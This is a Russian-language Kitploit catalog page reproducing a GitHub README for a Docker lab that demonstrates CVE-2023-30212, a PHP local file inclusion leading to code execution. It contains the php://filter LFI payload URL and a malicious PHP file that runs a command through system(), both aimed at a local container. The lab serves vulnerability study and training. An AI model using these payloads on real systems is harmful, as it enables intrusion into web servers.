Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2023-30212 — PoC для CVE-2023-30212 с использованием Docker | Kitploit
Инструменты/GitHubGitHub/sungmin20/cve-2023-30212
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubsungmin20/cve-2023-30212

cve-2023-30212

PoC для CVE-2023-30212 с использованием Docker

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2023-30212

PoC для CVE-2023-30212 с использованием Docker

CVE-2023-30212: Сборка среды и отчет PoC

📌 Обзор

Этот отчет содержит информацию о создании уязвимой веб-среды на основе Docker для уязвимости CVE-2023-30212, отсутствующей в Vulhub, и демонстрацию уязвимости с помощью PoC.

  • Номер CVE: CVE-2023-30212
  • Описание уязвимости: Возможность удаленного выполнения кода через PHP LFI (Local File Inclusion)
  • Сложность: Высокая (среда, отсутствующая в Vulhub)

🔧 Конфигурация среды

1. Dockerfile и docker-compose конфигурация

  • Базовый образ: php:8.1-apache
  • Копирование vulnerable.php и malicious.php в директорию
/var/www/html
  • Внешний доступ через порт 8088 Сборка Docker
  • 2. Описание основных файлов

    Имя файлаОписание
    vulnerable.phpPHP-файл с уязвимостью LFI
    malicious.phpВредоносный PHP-файл для выполнения системных команд
    docker-compose.ymlФайл конфигурации для сборки контейнера
    DockerfileФайл конфигурации для создания Docker-образа
    изображение
    изображение
    изображение
    изображение

    🚀 Процесс эксплуатации уязвимости (PoC)

    1. Запуск контейнера

    root@kitploit:~
    docker-compose up -d
    

    Имя контейнера: cve-2023-30212-cve-lfi-1

    Сервер Apache запускается, становится доступен по адресу http://localhost:8088

    2. Просмотр исходного кода вредоносного файла через LFI

    Вызовите следующий URL, чтобы просмотреть содержимое malicious.php в кодировке base64:

    root@kitploit:~
    http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
    
    base64

    При декодировании вывода получается следующий PHP-код:

    root@kitploit:~
    <?php system("touch /tmp/pwned"); ?>
    
    изображение

    3. Выполнение команды и проверка результата

    Вызовите следующий URL, чтобы фактически выполнить команду:

    root@kitploit:~
    http://localhost:8088/malicious.php
    

    После выполнения должен создаться файл /tmp/pwned.

    root@kitploit:~
    docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
    

    Если в результате присутствует файл pwned, то всё успешно.

    файл pwned

    Итоговое резюме

    • Успешно просмотрено и декодировано содержимое вредоносного файла через уязвимость LFI на основе php://filter.
    • Успешно выполнена произвольная команда через вызов вредоносного PHP, содержащего функцию system().
    • Проверка PoC завершена созданием файла /tmp/pwned.
    Скачать инструмент